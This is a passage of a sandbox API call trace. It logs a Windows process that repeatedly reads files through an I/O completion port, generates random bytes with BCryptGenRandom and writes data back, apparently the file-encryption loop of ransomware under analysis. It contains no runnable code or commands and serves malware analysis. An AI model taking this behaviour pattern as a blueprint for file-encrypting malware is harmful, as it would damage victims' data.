| out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0146.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.202] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x2370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0146.203] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.216] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x794, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.230] CloseHandle (hObject=0x170) returned 1 [0146.230] free (_Block=0x3df0008) [0146.230] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.235] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2c54, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0146.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.236] CloseHandle (hObject=0x3cc) returned 1 [0146.237] free (_Block=0x3d70450) [0146.237] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.674] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.678] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.678] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.678] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.678] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.678] free (_Block=0x3e305b8) [0146.678] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.678] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.678] free (_Block=0x1fa91d0) [0146.679] free (_Block=0x1fa2ed8) [0146.679] free (_Block=0x1fa90b8) [0146.679] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0146.679] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.680] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0146.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.692] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x812c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.693] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.694] CloseHandle (hObject=0x2a4) returned 1 [0146.694] free (_Block=0x3df0008) [0146.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.704] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.704] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.704] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.704] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.704] free (_Block=0x3e305b8) [0146.704] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.705] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.705] free (_Block=0x1fa91d0) [0146.705] free (_Block=0x1fa2ed8) [0146.705] free (_Block=0x1fa90b8) [0146.705] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.706] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.717] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1ea8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.718] CloseHandle (hObject=0x2a4) returned 1 [0146.718] free (_Block=0x3df0008) [0146.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.728] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.728] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.729] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.729] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.729] free (_Block=0x3e305b8) [0146.729] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.729] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.730] free (_Block=0x1fa91d0) [0146.730] free (_Block=0x1fa2ed8) [0146.730] free (_Block=0x1fa90b8) [0146.730] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.730] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.731] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1fd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.744] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x22b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.744] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.745] CloseHandle (hObject=0x2a4) returned 1 [0146.745] free (_Block=0x3df0008) [0146.745] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.755] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.755] free (_Block=0x3e305b8) [0146.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.755] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.756] free (_Block=0x1fa91d0) [0146.756] free (_Block=0x1fa2ed8) [0146.756] free (_Block=0x1fa90b8) [0146.756] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.756] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.771] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbc0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.771] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.780] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.780] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.780] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.781] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.781] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.781] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.781] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.781] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.781] free (_Block=0x3e305b8) [0146.781] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.781] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.782] free (_Block=0x1fa91d0) [0146.782] free (_Block=0x1fa2ed8) [0146.782] free (_Block=0x1fa90b8) [0146.782] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.782] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.784] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4e80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.785] CloseHandle (hObject=0x3cc) returned 1 [0146.785] free (_Block=0x1ff1e60) [0146.785] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.793] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.793] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.793] free (_Block=0x3e305b8) [0146.793] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.793] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.793] free (_Block=0x1fa91d0) [0146.793] free (_Block=0x1fa2ed8) [0146.793] free (_Block=0x1fa90b8) [0146.793] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.793] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.795] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8f10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.795] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.795] CloseHandle (hObject=0x3cc) returned 1 [0146.796] free (_Block=0x1ff1e60) [0146.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.803] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.804] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.804] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.804] free (_Block=0x3e305b8) [0146.804] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.804] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.804] free (_Block=0x1fa91d0) [0146.804] free (_Block=0x1fa2ed8) [0146.804] free (_Block=0x1fa90b8) [0146.804] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.804] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.805] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7850, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.806] CloseHandle (hObject=0x3cc) returned 1 [0146.806] free (_Block=0x1ff1e60) [0146.806] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.814] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.814] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.814] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.814] free (_Block=0x3e305b8) [0146.814] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.814] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.814] free (_Block=0x1fa91d0) [0146.814] free (_Block=0x1fa2ed8) [0146.815] free (_Block=0x1fa90b8) [0146.815] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.816] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.817] CloseHandle (hObject=0x3cc) returned 1 [0146.817] free (_Block=0x1ff1e60) [0146.817] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0146.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.824] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0146.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0146.825] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.825] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.825] free (_Block=0x3e305b8) [0146.825] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.825] calloc (_Count=0x82, _Size=0x4) returned 